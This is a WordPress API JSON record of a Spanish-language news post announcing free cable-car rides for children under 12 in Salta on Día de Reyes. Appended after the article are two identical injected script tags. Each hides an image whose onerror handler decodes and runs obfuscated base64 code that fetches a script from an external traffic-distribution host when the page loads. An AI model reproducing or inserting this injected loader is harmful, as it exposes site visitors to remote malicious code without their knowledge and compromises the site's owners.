{"id":3478,"date":"2024-01-05T11:40:30","date_gmt":"2024-01-05T14:40:30","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3478"},"modified":"2025-08-14T00:02:40","modified_gmt":"2025-08-14T03:02:40","slug":"teleferico-san-bernardo-sera-gratuito-para-los-menores-por-el-dia-de-reyes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3478","title":{"rendered":"Telef\u00e9rico San Bernardo ser\u00e1 gratuito para los menores por el D\u00eda de Reyes"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-aa42f12fc77af8d1f6638bac4641187a\" style=\"background-color:#770436\"><em>El Telef\u00e9rico San Bernardo, una vez m\u00e1s, siendo un cl\u00e1sico para esta \u00e9poca del a\u00f1o, ofrecer\u00e1 un viaje (ida y vuelta) gratuito para los menores de 12 a\u00f1os de edad por el D\u00eda de Reyes Magos, a celebrarse el pr\u00f3ximo s\u00e1bado 6 de enero.<\/em><\/h4>\n\n\n\n<p>El ascenso se realizar\u00e1 desde las 9 hs y los mayores de edad que acompa\u00f1en a los ni\u00f1os abonar\u00e1n una tarifa especial de $1000. Se recuerda que por cada cuatro ni\u00f1os deber\u00e1 viajar un adulto responsable.<\/p>\n\n\n\n<p>\u00abEstas fechas son muy especiales para todos los ni\u00f1os y ni\u00f1as, y por eso desde el Gobierno de Salta buscamos generar diferentes opciones para que ellos disfruten, como es en este caso un viaje en g\u00f3ndola que siempre es una gran experiencia\u00bb indic\u00f3 el ministro de Turismo y Deportes de Salta,&nbsp;<strong>Mario Pe\u00f1a<\/strong>.<\/p>\n\n\n\n<p>\u201cQueremos que los ni\u00f1os de Salta y de todo el pa\u00eds puedan disfrutar de una experiencia m\u00e1gica en la cima del cerro San Bernardo\u201d, expres\u00f3 el presidente del Telef\u00e9rico San Bernardo,&nbsp;<strong>\u00c1ngel Causarano<\/strong>. \u201cPor eso, hemos decidido brindar, como siempre, el viaje gratuito para los menores de 12 a\u00f1os, acompa\u00f1ados de un adulto responsable\u201d, agreg\u00f3.<\/p>\n\n\n\n<p>El Telef\u00e9rico San Bernardo es uno de los principales atractivos tur\u00edsticos de nuestra provincia y espera con ansias la visita de salte\u00f1os y turistas en esta nueva temporada de vacaciones de verano.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><em><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/teleferico-san-bernardo-sera-gratuito-para-los-menores-por-el-dia-de-reyes-93632\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/em><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Telef\u00e9rico San Bernardo, una vez m\u00e1s, siendo un cl\u00e1sico para esta \u00e9poca del a\u00f1o, ofrecer\u00e1 un viaje (ida y vuelta) gratuito para los menores de 12 a\u00f1os de edad por el D\u00eda de Reyes Magos, a celebrarse el pr\u00f3ximo s\u00e1bado 6 de enero. El ascenso se realizar\u00e1 desde las 9 hs y los mayores [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3479,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-3478","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3478"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3478"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3478\/revisions"}],"predecessor-version":[{"id":6881,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3478\/revisions\/6881"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3479"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3478"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3478"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3478"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}